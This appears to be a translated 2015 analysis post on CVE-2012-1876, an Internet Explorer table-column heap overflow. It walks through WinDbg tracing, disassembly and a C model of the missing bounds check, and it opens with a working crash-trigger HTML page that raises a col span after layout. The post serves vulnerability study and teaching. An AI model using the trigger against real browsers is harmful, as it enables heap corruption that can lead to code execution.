[Original] Vulnerability analysis notes: CVE-2012-1876
Posted: 2015-1-1 19:57
<html>
<body>
<table style="table-layout:fixed" >
<!-- one col at parse time; its id is looked up from script below -->
<col id="132" width="41" span="1" >  </col>
</table>
<script>
function over_trigger() {
var obj_col = document.getElementById("132");
obj_col.width = "42765";   // width pushed to a large value
obj_col.span = 1000;       // span raised from 1 to 1000 after the initial layout
}
setTimeout("over_trigger();",1);  // fire after the first layout pass has run
</script>
</body>
</html>
This note is mainly about the debugging approach. Most write-ups online explain the root cause of the bug, but very few explain how it was actually tracked down in the debugger.
Starting from the sample above, with no other details to go on, I first looked for any documentation of the relevant structures and found none.
With nothing else to try, I loaded the sample and let the browser crash, but the crash site is too far from where the corruption happens to trace backwards, and !heap -p -a address gave no useful information either. (Note that !heap -p -a only returns allocation details when page heap is enabled for the process, e.g. gflags /p /enable iexplore.exe /full; without it the output is empty.)
As a last resort I tried a crude trick that is not guaranteed to work: x mshtml!*getElementById*
0:005> x mshtml!*getElementById*
676a1afc mshtml!s_methdescCDocumentie8_getElementById = <no type information>
6764f678 mshtml!CDocument::getElementById = <no type information>
675464fa mshtml!CMarkup::GetElementByID = <no type information>
676a185c mshtml!s_methdescCDocumentgetElementById = <no type information>
6754645a mshtml!CDocument::ie8_getElementById = <no type information>
6764df3e mshtml!CDocument::InternalGetElementById = <no type information>
Not knowing which of these functions actually handles the call, I simply set breakpoints on all of them:
bu *******
Details omitted.
0:005> g
Breakpoint 35 hit
eax=04191038 ebx=67a08b78 ecx=6764f678 edx=0386eb74 esi=00001200 edi=00000000
eip=6764f678 esp=0386eb48 ebp=0386eb78 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CDocument::getElementById:
The breakpoint hit here; after letting it run a few more times none of the other functions broke, so this one is the handler.
After a rough look through it I still had no lead, and being lazy I wanted to see the execution flow, so I used tc 10000 (look up the documentation for what tc does; briefly, it steps to the next call instruction and prints the register state each time, as in the trace below). The advantage is that when the program crashes you can read the execution flow upward from the crash. It is a bit slow, but at least it is automatic.
eax=00000009 ebx=00414114 ecx=04141149 edx=00004141 esi=002bed14 edi=002bed2c
eip=678ff169 esp=0356dcb8 ebp=0356dcc4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CTableColCalc::AdjustForCol+0x17:
678ff169 e89eacdbff call mshtml!CUnitValue::IsScalerUnit (676b9e0c)
eax=00414114 ebx=00414114 ecx=04141149 edx=00004141 esi=002bed14 edi=002bed2c
eip=678ff177 esp=0356dcb4 ebp=0356dcc4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableColCalc::AdjustForCol+0x25:
678ff177 e805c4bdff call mshtml!CUnitValue::SetValue (674db581)
eax=003148b0 ebx=003475f0 ecx=00002530 edx=00004141 esi=002bed30 edi=00000001
eip=67775b89 esp=0356dccc ebp=0356dd74 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x52a:
67775b89 e8c4951800 call mshtml!CTableColCalc::AdjustForCol (678ff152)
eax=00000009 ebx=00414114 ecx=04141149 edx=00004141 esi=002bed30 edi=002bed48
eip=678ff169 esp=0356dcb8 ebp=0356dcc4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CTableColCalc::AdjustForCol+0x17:
678ff169 e89eacdbff call mshtml!CUnitValue::IsScalerUnit (676b9e0c)
eax=00414114 ebx=00414114 ecx=04141149 edx=00004141 esi=002bed30 edi=002bed48
eip=678ff177 esp=0356dcb4 ebp=0356dcc4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableColCalc::AdjustForCol+0x25:
678ff177 e805c4bdff call mshtml!CUnitValue::SetValue (674db581)
eax=003148b0 ebx=003475f0 ecx=0000254c edx=00004141 esi=002bed4c edi=00000001
eip=67775b89 esp=0356dccc ebp=0356dd74 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x52a:
67775b89 e8c4951800 call mshtml!CTableColCalc::AdjustForCol (678ff152)
(820.d2c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=002dcef8 ecx=00250000 edx=002dcef8 esi=7389dec2 edi=002dcee0
eip=774b1ffe esp=0520e1c0 ebp=0520e1f4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
ntdll!RtlpLowFragHeapFree+0x31:
774b1ffe 8b4604 mov eax,dword ptr [esi+4] ds:0023:7389dec6=????????
IE crashed here, in the LFH free path, reading a heap block header through an unreadable pointer (esi=7389dec2), which means the heap was already corrupted by an earlier write.
Tracing back up the trace we can see call mshtml!CTableColCalc::AdjustForCol.
What remains is the in-depth analysis of the problem itself, which comes down to fundamentals and hard skills; there are no tricks to speak of.
Set a breakpoint on that function with bu mshtml!CTableColCalc::AdjustForCol
and rerun the program.
When it breaks there, inspect the stack:
Breakpoint 42 hit
eax=003ccdd8 ebx=00417710 ecx=00000000 edx=00004141 esi=04183138 edi=00000001
eip=678ff152 esp=0386daa8 ebp=0386db54 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableColCalc::AdjustForCol:
678ff152 8bff mov edi,edi
0:005> k
ChildEBP RetAddr
0386daa4 67775b8e mshtml!CTableColCalc::AdjustForCol
0386db54 675e0713 mshtml!CTableLayout::CalculateMinMax+0x52f
0386dd70 675caf19 mshtml!CTableLayout::CalculateLayout+0x276
0386df1c 676bcc48 mshtml!CTableLayout::CalcSizeVirtual+0x720
0386e054 676af5d0 mshtml!CLayout::CalcSize+0x2b8
0386e118 676af31d mshtml!CFlowLayout::MeasureSite+0x312
0386e160 676af664 mshtml!CFlowLayout::GetSiteWidth+0x156
0386e1a0 676afb40 mshtml!CLSMeasurer::GetSiteWidth+0xce
0386e224 6e69665d mshtml!CEmbeddedILSObj::Fmt+0x150
0386e2b4 6e696399 msls31!ProcessOneRun+0x3e9
0386e310 6e696252 msls31!FetchAppendEscCore+0x18e
0386e364 6e6961c3 msls31!LsDestroyLine+0x47f
0386e3ec 6e69293f msls31!LsDestroyLine+0x9ff
0386e428 676add81 msls31!LsCreateLine+0xcb
0386e578 676c17cc mshtml!CLSMeasurer::LSDoCreateLine+0x127
0386e61c 676c1ef5 mshtml!CLSMeasurer::LSMeasure+0x34
0386e664 676c1db1 mshtml!CLSMeasurer::Measure+0x1e6
0386e688 676c11a2 mshtml!CLSMeasurer::MeasureLine+0x1c
0386e738 676ea8f6 mshtml!CRecalcLinePtr::MeasureLine+0x46d
0386ef40 676eb304 mshtml!CDisplay::RecalcLines+0x8bb
Disassembling mshtml!CTableLayout::CalculateMinMax further, it turns out to be a big loop:
loc_74EC5B7A:
push [ebp+var_3C]
mov eax, [ebp+var_34]
push [ebp+arg_4]
mov esi, [ebp+var_24]
push [ebp+var_C]
call ?AdjustForCol@CTableColCalc@@QAEXPBVCWidthUnitValue@@HPAVCCalcInfo@@H@Z ; CTableColCalc::AdjustForCol(CWidthUnitValue const *,int,CCalcInfo *,int)
inc [ebp+var_14]
mov eax, [ebp+var_14]
add [ebp+var_20], 1Ch
cmp eax, [ebp+nDenominator]
jl short loc_74EC5B4C
Looking at the corresponding values in the debugger, an interesting one shows up:
0:005>
eax=00000003 ebx=00417710 ecx=04183188 edx=00004141 esi=04183170 edi=00000001
eip=67775b98 esp=0386dab8 ebp=0386db54 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
mshtml!CTableLayout::CalculateMinMax+0x539:
67775b98 3b4510 cmp eax,dword ptr [ebp+10h] ss:0023:0386db64=000003e8
This corresponds to obj_col.span = 1000 in the PoC above; 1000 in hexadecimal is 3e8.
The loop counter in var_14 runs up to that span value and the column pointer in var_20 advances by 1Ch each iteration, so AdjustForCol is called once per span entry, far more times than the single col the table had when it was laid out.
From here it is just a matter of patience and fundamentals.
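As an added example that is not code from the original post or from mshtml, here is a small C model of the loop above. It assumes a column record is an opaque 0x1C-byte struct (the stride seen in add [ebp+var_20], 1Ch) and that the array was allocated for the column count the table had at parse time (one col in the PoC), while the loop bound is the span value taken from the DOM (0x3e8). The names run_span_loop and adjust_for_col are hypothetical. Instead of letting the overrun hit the real heap, the array is over-allocated with a zero-filled redzone so the number of records written past the allocation can be counted, and a clamped variant shows the bounds check the loop is missing.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model of the loop seen in CTableLayout::CalculateMinMax:
 * each iteration calls AdjustForCol and advances the column pointer by
 * 0x1C bytes until the counter reaches the span value (0x3E8 in the PoC).
 * This is NOT mshtml's code; the record layout below is an assumption. */
#define COLCALC_STRIDE 0x1c          /* from: add [ebp+var_20], 1Ch */
#define POC_SPAN       0x3e8         /* from: obj_col.span = 1000 */
#define REDZONE_COLS   2048          /* guard region so the overrun is observable */

typedef struct {
    uint8_t raw[COLCALC_STRIDE];     /* opaque 0x1C-byte column record */
} col_calc_t;

/* Model of AdjustForCol: fills one column record with the width value. */
static void adjust_for_col(col_calc_t *col, uint32_t width)
{
    memset(col->raw, 0, sizeof col->raw);
    memcpy(col->raw, &width, sizeof width);
}

/* Runs the per-span loop against an array allocated for `capacity` columns.
 * With checked == 0 the loop trusts the span value (the vulnerable shape);
 * otherwise the iteration count is clamped to the allocation.
 * The backing store is over-allocated with a zero-filled redzone, so the
 * overrun lands in memory we own instead of corrupting heap metadata.
 * Returns the number of records written past `capacity`, or (size_t)-1 if
 * the model cannot contain the requested span. */
size_t run_span_loop(size_t capacity, size_t span, uint32_t width, int checked)
{
    size_t total = capacity + REDZONE_COLS;
    col_calc_t *cols = calloc(total, sizeof *cols);
    if (!cols || span > total) { free(cols); return (size_t)-1; }

    size_t limit = checked ? (span < capacity ? span : capacity) : span;
    for (size_t i = 0; i < limit; i++)        /* cmp eax,[ebp+10h] ; jl loop */
        adjust_for_col(&cols[i], width);

    /* Count redzone records that are no longer all-zero. */
    size_t overrun = 0;
    for (size_t i = capacity; i < total; i++) {
        int dirty = 0;
        for (size_t b = 0; b < COLCALC_STRIDE; b++) dirty |= cols[i].raw[b];
        if (dirty) overrun++;
    }
    free(cols);
    return overrun;
}

/* Bytes written past the allocation for a given number of overrun records. */
size_t overrun_bytes(size_t overrun_records)
{
    return overrun_records * COLCALC_STRIDE;
}

int main(void)
{
    size_t r = run_span_loop(1, POC_SPAN, 42765, 0);
    printf("unchecked: %zu records (%zu bytes) past the 1-column array\n",
           r, overrun_bytes(r));
    r = run_span_loop(1, POC_SPAN, 42765, 1);
    printf("clamped:   %zu records past the array\n", r);
    return 0;
}
```

With the PoC's values the unchecked loop writes 999 records (999 * 0x1C bytes) beyond a one-column array, which is the kind of sequential heap overwrite that later surfaces as the RtlpLowFragHeapFree crash above; the clamped loop writes none.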